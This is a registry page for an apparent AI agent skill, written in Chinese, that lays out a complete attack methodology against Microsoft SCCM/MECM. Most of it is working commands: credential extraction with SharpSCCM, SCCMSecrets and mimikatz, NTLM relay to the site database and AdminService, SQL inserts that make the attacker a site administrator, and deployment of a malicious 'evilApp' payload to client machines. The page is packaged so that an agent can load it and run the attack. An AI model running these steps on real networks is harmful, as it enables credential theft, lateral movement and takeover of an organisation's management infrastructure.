sccm-mecm-attack
$
npx mdskill add wgpsec/AboutSecurity/sccm-mecm-attackExtract SCCM credentials and execute lateral movement attacks.
- Steal NAA accounts and task sequence passwords from MP servers.
- Integrates SharpSCCM, sccmhunter, and AdminService APIs.
- Uses DNS SRV records and BloodHound to target MP and DP.
- Delivers stolen credentials and site takeover status to the agent.
SKILL.md
.github/skills/sccm-mecm-attackView on GitHub ↗
---
name: sccm-mecm-attack
description: "针对 Microsoft SCCM/MECM (Configuration Manager) 的攻击方法论。当内网发现 SCCM 站点服务器、管理点(MP)、分发点(DP) 时使用。覆盖 NAA 凭证提取、任务序列密码、PXE 启动介质、Client Push 强制认证、站点服务器接管、应用部署横向移动、AdminService API 利用、层级接管(CAS→Primary)。"
metadata:
tags: "sccm,mecm,configmgr,configuration manager,NAA,network access account,client push,PXE,task sequence,site takeover,hierarchy,SharpSCCM,sccmhunter,AdminService,SCCMSecrets,distribution point"
category: "lateral"
---
# SCCM/MECM 攻击
## 触发条件
在以下场景使用本技能:
- 内网发现 SCCM / MECM / ConfigMgr 服务 (站点服务器、MP、DP)
- DNS 枚举发现 `_mssms_mp` 或 `_mssms_sul` SRV 记录
- 发现 Management Point (MP) 或 Distribution Point (DP)
- 需要利用 SCCM 进行横向移动或凭证获取
- BloodHound / LDAP 枚举发现 `mSSMSManagementPoint` 对象
## 前置要求
- 域用户凭证 (部分技术支持匿名或机器账号)
- 工具: SharpSCCM, sccmhunter, SCCMSecrets, pxethiefy, cmloot, ntlmrelayx
- 网络可达: MP (TCP 80/443), DP (TCP 80/443), Site DB (TCP 1433), SMS Provider (TCP 443)
## SCCM 架构速查表
| 角色 | 说明 | 默认端口 | 关键标识 |
|------|------|----------|----------|
| **Primary Site Server** | 核心管理服务器 | - | 运行 SMS_SITE_COMPONENT_MANAGER |
| **Management Point (MP)** | 客户端策略分发 | 80/443 | IIS CCM_* 虚拟目录 |
| **Distribution Point (DP)** | 内容分发 | 80/443 | SMS_DP$ 共享 / SCCMContentLib$ |
| **Site Database** | SQL Server 存储 | 1433 | RBAC_Admins / RBAC_ExtendedPermissions |
| **SMS Provider** | WMI/AdminService API | 443 | AdminService REST API |
| **CAS** | 层级顶层 (多站点) | - | 管理多个 Primary |
---
## 决策树
```
[开始] 发现 SCCM 基础设施
│
├─ 有域凭证?
│ ├─ 是 → Phase 1: SCCM 侦察
│ └─ 否 → PXE 启动介质 / 匿名注册尝试
│
├─ 凭证获取
│ ├─ 可注册设备或控制机器账号 → Phase 2: 秘密策略提取
│ └─ 已在 SCCM 客户端 → 本地 DPAPI 提取
│
├─ 权限提升
│ ├─ Client Push 启用 → Phase 3: 强制认证 relay
│ └─ 有 SCCM 管理员 → Phase 4: 横向移动
│
└─ 层级接管
└─ 多站点环境 → Phase 5: CAS 传播
```
---
## Phase 1: SCCM 侦察
**目标**: 发现并识别 SCCM 基础设施组件
### 1.1 DNS SRV 记录查询
```bash
# 查找 Management Point
nslookup -type=SRV _mssms_mp._tcp.$DOMAIN
dig SRV _mssms_mp._tcp.$DOMAIN
# 查找 Software Update Point
nslookup -type=SRV _mssms_sul._tcp.$DOMAIN
```
### 1.2 LDAP 枚举
```powershell
# 查找 Management Point 对象
([ADSISearcher]("objectClass=mSSMSManagementPoint")).FindAll() | % {$_.Properties}
# 查找 SCCM 相关 SPN
setspn -Q *SMS* | findstr /i "SMS"
setspn -Q *SCCM* | findstr /i "SCCM"
```
### 1.3 sccmhunter 自动侦察
```bash
# 发现 SCCM 基础设施
sccmhunter.py find -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP
# SMB 枚举确认角色
sccmhunter.py smb -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP
# 显示发现结果
sccmhunter.py show -smb
sccmhunter.py show -all
```
### 1.4 本地信息收集
```powershell
# 本地站点信息 (已安装 SCCM 客户端)
SharpSCCM.exe local site-info
# WMI 查询
Get-WmiObject -Class SMS_Authority -Namespace root\CCM
```
### 1.5 PXE 启动介质发现
```bash
# 探测 PXE 环境 (无需域凭证)
pxethiefy.py explore -i $INTERFACE
```
---
## Phase 2: 凭证获取
**目标**: 提取 NAA 凭证、任务序列密码、DP 敏感文件
### 2.1 NAA 提取 — 注册新设备
```bash
# HTTP MP — SCCMSecrets (推荐)
python3 SCCMSecrets.py policies -mp "http://$MP_IP" \
-u "$MACHINE_NAME" -p "$MACHINE_PASSWORD" -cn "newdevice"
# HTTPS MP (PKI 环境)
python3 SCCMSecrets.py policies -mp "https://$MP_IP" \
-u '$MACHINE_NAME' -p '$MACHINE_PASSWORD' -cn 'newdevice' \
--pki-cert ./cert.pem --pki-key ./key.pem
# NTLM relay 提取策略
ntlmrelayx.py -t 'http://$MP_IP/ccm_system_windowsauth/request' \
-smb2support --sccm-policies
# sccmhunter 自动化
sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto
```
```powershell
# Windows — SharpSCCM
SharpSCCM.exe get secrets -r newdevice -u $MACHINE_NAME -p $PASSWORD
```
### 2.2 PXE 启动介质密码提取
```bash
# Phase 1 发现 PXE 后,解密启动介质中的凭证
pxethiefy.py decrypt -f $PXE_MEDIA_FILE
```
### 2.3 NAA 提取 — 复用已有设备
```bash
# 使用已攻陷设备的注册凭据
python3 SCCMSecrets.py policies -mp "http://$MP_IP" \
--use-existing-device compromised_device/
```
### 2.4 本地 DPAPI 提取
```bash
# SystemDPAPIdump (远程)
SystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@$TARGET
```
```powershell
# SharpSCCM 本地
SharpSCCM.exe local secrets disk
SharpSCCM.exe local secrets wmi
# SharpDPAPI
SharpDPAPI.exe SCCM
```
```
# mimikatz
dpapi::sccm
```
### 2.5 WMI 直接查询
```powershell
# NAA 凭证 (加密 blob)
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig \
-Class CCM_NetworkAccessAccount
# 任务序列变量
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig \
-Class CCM_TaskSequence
```
### 2.6 Distribution Point 文件搜刮
```bash
# SCCMSecrets — 按扩展名搜刮
python3 SCCMSecrets.py files -dp "http://$DP_IP" \
-u '$USER' -H '$HASH' \
--extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'
# cmloot — 批量搜刮
python3 cmloot.py $DOMAIN/$USER@$TARGET \
-findsccmservers -target-file sccmhosts.txt \
-cmlootdownload sccmfiles.txt
```
---
## Phase 3: 权限提升
**目标**: 通过 Client Push / Site DB / AdminService relay 获取站点管理员
### 3.1 Client Push 强制认证
**原理**: Client Push 安装会使用高权限账号对目标发起 NTLM 认证,relay 到其他目标。
```bash
# 启动 relay
ntlmrelayx.py -smb2support -socks -ts -ip $ATTACKER_IP -t $TARGET
```
```powershell
# 触发 Client Push
SharpSCCM.exe invoke client-push -t $TARGET --as-admin
```
### 3.2 站点接管 — MSSQL Relay
**原理**: 站点服务器机器账号对 Site Database 有 sysadmin 权限,relay 到 MSSQL 后注入管理员。
```bash
# 步骤 1: 启动 MSSQL relay
ntlmrelayx.py -t "mssql://$SITE_DB" -smb2support -socks
# 步骤 2: 触发站点服务器认证 (Coercer / PetitPotam 等)
# 步骤 3: 通过 SOCKS 连接 SQL
proxychains mssqlclient.py "DOMAIN/$SITE_SERVER$"@"$SITE_DB" -windows-auth
```
```sql
-- 步骤 4: 注入 SCCM 管理员
-- 先获取目标用户 SID
USE CM_$SITE_CODE;
INSERT INTO RBAC_Admins (AdminSID, LogonName, DisplayName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite)
VALUES ($ADMIN_SID, '$DOMAIN\$USER', '$DOMAIN\$USER', 0, 0, '', '', '', '', '$SITE_CODE');
INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = '$DOMAIN\$USER'),
'SMS0001R', 'SMS00ALL', 29);
INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = '$DOMAIN\$USER'),
'SMS0001R', 'SMS00001', 1);
INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID)
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = '$DOMAIN\$USER'),
'SMS0001R', 'SMS00004', 1);
```
### 3.3 站点接管 — AdminService Relay
```bash
# relay 到 SMS Provider AdminService
ntlmrelayx.py -t "https://$SMS_PROVIDER/AdminService/wmi/SMS_Admin" \
-smb2support --adminservice \
--logonname "$DOMAIN\\$USER" \
--displayname "$DOMAIN\\$USER" \
--objectsid $OBJECTSID
```
### 3.4 Passive → Active 站点服务器 Relay
```bash
# relay passive 站点服务器到 active 站点服务器
ntlmrelayx.py -t $ACTIVE_SERVER -smb2support -socks
# 通过 SOCKS dump hash
proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\$@$ACTIVE_SERVER
# 以 active 站点服务器身份接管
sccmhunter.py admin -u $ACTIVE_SERVER\$ -p $LMHASH:$NTHASH -ip $SMS_PROVIDER_IP
```
---
## Phase 4: 横向移动
**目标**: 利用 SCCM 管理员权限在客户端执行命令
### 4.1 应用部署
```powershell
# SharpSCCM — 指定资源 ID 执行
SharpSCCM.exe exec -rid $RESOURCE_ID -r $TARGET
```
### 4.2 PowerSCCM 完整工作流
```powershell
# 发现站点代码
Find-SccmSiteCode -ComputerName $SITE_SERVER
# 建立会话
$session = New-SccmSession -ComputerName $SITE_SERVER -SiteCode $SITE_CODE -Credential $CRED
# 创建恶意应用
New-SccmApplication -Session $session -ApplicationName "evilApp" \
-PowerShellB64 $ENCODED_PAYLOAD
# 部署到目标
New-SccmApplicationDeployment -Session $session -ApplicationName "evilApp" \
-AssignmentName "deploy" -CollectionName "target_collection"
# 强制客户端检入
Invoke-SCCMDeviceCheckin -Session $session -CollectionName "target_collection"
```
### 4.3 CMScript 执行
```powershell
New-CMScriptDeployement -CMDrive 'E' -ServerFQDN '$SITE_SERVER' \
-TargetDevice '$TARGET' -Path '.\payload.ps1' -ScriptName 'evilScript'
```
### 4.4 AdminService API 交互
```bash
# sccmhunter 管理控制台
sccmhunter.py admin -u "$USER" -p "$PASSWORD" -ip "$SITE_SERVER_IP"
# 交互命令: help, interact, ps, ls, cat, exec, etc.
```
---
## Phase 5: 层级接管
**目标**: 从单站点扩展到整个 SCCM 层级
### 5.1 CAS 自动传播
在任一 Primary 站点添加的管理员会自动传播到 CAS 及所有子站点。利用 Phase 3 在一个 Primary 上执行 `add_admin` 后,等待复制同步即可控制全部站点。
```bash
# 在 sccmhunter admin 会话中
add_admin $DOMAIN\\$USER $ADMIN_SID
```
### 5.2 TAKEOVER-5: 跨站点 AdminService Relay
在多站点环境中,relay 到远程 SMS Provider 的 AdminService 添加管理员。
```bash
ntlmrelayx.py -t "https://$REMOTE_SMS_PROVIDER/AdminService/wmi/SMS_Admin" \
-smb2support --adminservice \
--logonname "$DOMAIN\\$USER" \
--displayname "$DOMAIN\\$USER" \
--objectsid $OBJECTSID
```
> **注意**: ConfigMgr 2509+ 默认拒绝 AdminService 上的 NTLM 认证,此技术仅适用于早期版本。
---
## 常见问题排查
### 无法注册新设备
1. MP 要求 HTTPS + 客户端证书 — 需获取 PKI 证书或 relay
2. 自动审批未开启 — 尝试 relay 已批准设备的认证
3. 站点配置 "仅域加入设备" — 需使用已有机器账号
### NAA 提取为空
1. 站点未配置 NAA (eNAA 环境) — 尝试任务序列提取
2. NAA 密码已过期 — 检查 Collection Variables
3. WMI 策略尚未下发 — 等待策略刷新周期
### Relay 失败
1. 目标启用 SMB 签名 — 无法 relay SMB,改用 HTTP/MSSQL
2. EPA (Extended Protection for Authentication) — 绕过需要 TLS 证书私钥
3. ConfigMgr 2509+ 拒绝 NTLM on AdminService — 需使用 MSSQL 路径
---
## 工具参考
| 工具 | 用途 | 平台 |
|------|------|------|
| sccmhunter | SCCM 侦察/利用/管理 | Linux |
| SharpSCCM | SCCM 客户端利用 | Windows |
| SCCMSecrets | 策略/NAA/DP 提取 | Linux |
| pxethiefy | PXE 启动介质分析 | Linux |
| cmloot / sccm-http-looter | DP 文件搜刮 | Linux |
| ntlmrelayx | NTLM relay 攻击 | Linux |
| PowerSCCM | SCCM 管理操作 | Windows |
---
## 深入参考
- → [references/sccm-enumeration.md](references/sccm-enumeration.md) — SCCM 侦察方法与工具命令参考
- → [references/credential-harvesting.md](references/credential-harvesting.md) — 秘密策略提取、NAA/任务序列/DP 凭证获取详解
- → [references/site-takeover.md](references/site-takeover.md) — 站点接管与横向移动完整攻击链
More from wgpsec/AboutSecurity
- 401-403-bypass401/403 访问拒绝绕过方法论。当遇到管理后台、API 端点返回 401/403 Forbidden 时使用。覆盖路径操纵、HTTP 方法篡改、Header 注入、协议降级、组合攻击
- ad-acl-abuseActive Directory ACL 滥用攻击方法论。当 BloodHound 发现 GenericAll/WriteDACL/WriteOwner/GenericWrite/ForceChangePassword 等危险 ACE 时使用。覆盖 ACE 枚举、权限滥用链、Shadow Credentials、RBCD 攻击
- ad-delegation-attackKerberos 委派攻击(非约束/约束/RBCD)。当 BloodHound 发现委派配置、或已获取有 SPN 的服务账号/机器账号控制权时使用。通过 S4U 协议滥用可实现跨服务模拟任意用户,常用于域内权限提升和横向移动。
- ad-domain-attackActive Directory 域环境攻击全链路。当目标主机在域环境中(systeminfo 显示 Domain 非 WORKGROUP)、发现 88/389/636 端口、或获取到域用户凭据时使用。覆盖域信息收集、用户枚举、Kerberoasting、AS-REP Roasting、委派攻击、ACL 滥用、DCSync、Golden/Silver Ticket
- ad-persistenceAD 域环境持久化技术。当已获取域管/本地管理员权限、需要建立持久访问以确保重启或密码更改后仍能回到目标环境时使用。覆盖主机级持久化(计划任务/注册表Run/COM劫持/WMI事件订阅/Windows服务/启动文件夹)、域级持久化(Golden Ticket/Silver Ticket/Skeleton Key/DSRM/AdminSDHolder)、DCShadow/GoldenGMSA高级技术、清理命令与检测规避
- ad-trust-attack域信任关系攻击。当目标存在多域/多林环境时使用。包含父子域提权(Golden Ticket + ExtraSid)、跨林攻击(SID History/MSSQL Trust Links)、单向信任利用。已获取子域 Domain Admin 或发现信任关系时优先加载。
- adcs-certipy-attackActive Directory Certificate Services (ADCS) 证书攻击。当发现域内有 CA 服务器、ADCS Web Enrollment、证书模板配置错误时使用。覆盖 ESC1-ESC11 所有证书滥用路径、Certipy 工具链、证书伪造、NTLM 中继到 ADCS。发现 ADCS/CA/证书/certsrv 相关内容时一定要使用此技能
- adinfo-enum使用 Adinfo 进行 Active Directory 信息收集。当获得域用户凭据后需要快速收集域环境信息时使用。Adinfo 是一个快速 AD 信息收集工具,一条命令输出域控列表、域管用户、信任关系、GPO、SPN、委派配置等关键信息——比手动 LDAP 查询快得多。发现域环境后第一步信息收集使用此技能
- agent-security|
- ai-data-security|